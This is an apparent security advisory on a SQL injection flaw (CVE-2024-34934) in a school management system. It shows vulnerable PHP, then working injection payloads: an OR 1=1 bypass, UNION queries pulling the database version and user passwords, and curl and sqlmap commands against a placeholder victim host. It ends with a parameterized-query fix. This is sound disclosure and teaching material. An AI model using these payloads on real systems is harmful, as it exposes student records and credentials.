Published: 2024
Affects: Campcodes Complete Web-Based School Management System 1.
Vulnerability Type: SQL Injection
File: /view/emarks_range_grade_update_form.php
Vulnerable Parameter: conversation_id
CVE: CVE-2024-34934

Overview

A serious SQL Injection vulnerability (CVE-2024-34934) has been discovered in Campcodes Complete Web-Based School Management System version 1.. This flaw allows attackers to inject and execute arbitrary SQL commands via the conversation_id parameter in the file /view/emarks_range_grade_update_form.php.

If you run this school management software on your server, you should read this in detail: the flaw can reveal sensitive data or even give total control over your database.

Where's The Vulnerability?

The root of the problem is the way the software handles user input for the conversation_id parameter. The input isn’t sanitized or parameterized before being placed into an SQL query.

Example vulnerable PHP code

<?php
// This is a simplified example
include('../config/db_connect.php');

$conversation_id = $_GET['conversation_id']; // <<-- UNSAFE

$sql = "SELECT * FROM grade_changes WHERE conversation_id = '$conversation_id'"; // <<-- DANGEROUS
$result = mysqli_query($conn, $sql);
...
?>

The parameter is directly shoved into the SQL query, unescaped! This is classic SQL injection territory.

How Can It Be Exploited?

An attacker simply needs to craft a malicious URL, tweaking the conversation_id parameter.

Practical Exploit Example

Let’s say the web app is running at:
http://victim-school-system.com/view/emarks_range_grade_update_form.php?conversation_id=

A normal request:

/view/emarks_range_grade_update_form.php?conversation_id=1

An attacker's request

/view/emarks_range_grade_update_form.php?conversation_id=1' OR 1=1-- -

This conversation_id value closes the string, injects the always-true OR 1=1, and comments out the remainder of the query. The result: the query retrieves *all* records, or can be further manipulated for more damaging purposes.

Retrieve Database Version Example

/view/emarks_range_grade_update_form.php?conversation_id=1' UNION SELECT NULL, version(), NULL, NULL-- -

If the attacker knows the structure, they can try

/view/emarks_range_grade_update_form.php?conversation_id=1' UNION SELECT id, username, password, NULL FROM users-- -

Unauthorized data access (student records, grades, user details)

- Possible modification/deletion of records

Using curl

curl "http://victim-school-system.com/view/emarks_range_grade_update_form.php?conversation_id=1' OR 1=1-- -"

If sensitive info is returned, the app is vulnerable.

Automating data extraction example with sqlmap

sqlmap -u "http://victim-school-system.com/view/emarks_range_grade_update_form.php?conversation_id=1" --batch --dbs

Always sanitize user input! Here’s how you should be doing it in PHP with mysqli

$conversation_id = $_GET['conversation_id'];
$stmt = $conn->prepare("SELECT * FROM grade_changes WHERE conversation_id = ?");
$stmt->bind_param("s", $conversation_id);
$stmt->execute();

Or, if you have to use raw input, use mysqli_real_escape_string() at the very least (but parameterized queries are strongly recommended).

References

- CVE-2024-34934 - NVD Details
- Campcodes Official Site
- OWASP SQL Injection

Conclusion

CVE-2024-34934 is a critical SQL injection vulnerability in Campcodes Complete Web-Based School Management System 1. that can have a major impact on data security. If you use this product, patch immediately, validate and sanitize all inputs, and always use parameterized queries for database access.

If you’re reading this for educational or defensive reasons, remember: never test websites you do not own or have explicit permission to audit.

Timeline

Published on: 05/23/2024 17:15:30 UTC
Last modified on: 08/20/2024 15:35:13 UTC